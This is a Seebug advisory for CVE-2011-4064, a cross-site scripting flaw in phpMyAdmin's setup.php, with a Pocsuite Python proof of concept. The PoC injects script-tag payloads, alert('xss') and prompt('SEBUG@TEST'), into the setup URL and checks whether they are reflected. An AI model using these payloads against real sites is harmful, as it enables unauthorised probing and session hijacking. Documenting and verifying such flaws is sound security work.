seebug | Root | SSV:23110
Oct 18, 2011 - 12:00 a.m.

phpMyAdmin Setup Interface Cross-Site Scripting Vulnerability


EPSS: 0.003 (Percentile: 69.3%)

Bugtraq ID: 50175
CVE ID: CVE-2011-4064

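phpMyAdmin is a PHP-based MySQL administration tool.
Some input passed to setup.php is not filtered before it is returned to the user. An attacker can craft a malicious link and trick a user into opening it, which causes malicious script to execute in the target user's browser and can expose the user's sensitive information or allow the user's session to be hijacked.
If the configuration directory exists and is writable, the XSS payload can be saved in that directory.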

phpMyAdmin 3.x
Vendor solution
phpMyAdmin 3.4.6 fixes this vulnerability; users are advised to download and use it:
http://www.phpmyadmin.net/


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests

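'''
Original exploit link:
http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script>

Following WVS, use prompt instead of alert to get around restrictions to some extent, and match on a distinctive marker string:
<script>prompt("SEBUG@TEST");</script>

'''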

class TestPOC(POCBase):
    vulID = '23110'  # ssvid
    version = '1.0'
    author = ['XXXXX']
    vulDate = ''
    createDate = '2016-01-01'
    updateDate = '2016-01-01'
    references = ['http://www.sebug.net/vuldb/ssvid-23110']
    name = 'phpMyAdmin Setup接口跨站脚本漏洞'
    appPowerLink = 'http://www.phpmyadmin.net/'
    appName = 'phpMyAdmin'
    appVersion = ''
    vulType = 'XSS'
    desc = '''
    '''
    samples = ['']
    
    def _verify(self):
        result = {}

        vulurl = self.url + "/phpMyAdmin-2.11.1/scripts/setup.php?>'" + '"><script>prompt("SEBUG@TEST");</script>'

        resp = requests.get(vulurl)
        print(resp.url)

        # resp.text is a decoded string, so the substring check works on Python 2 and 3
        if '<script>prompt("SEBUG@TEST");</script>' in resp.text:
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = resp.url

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)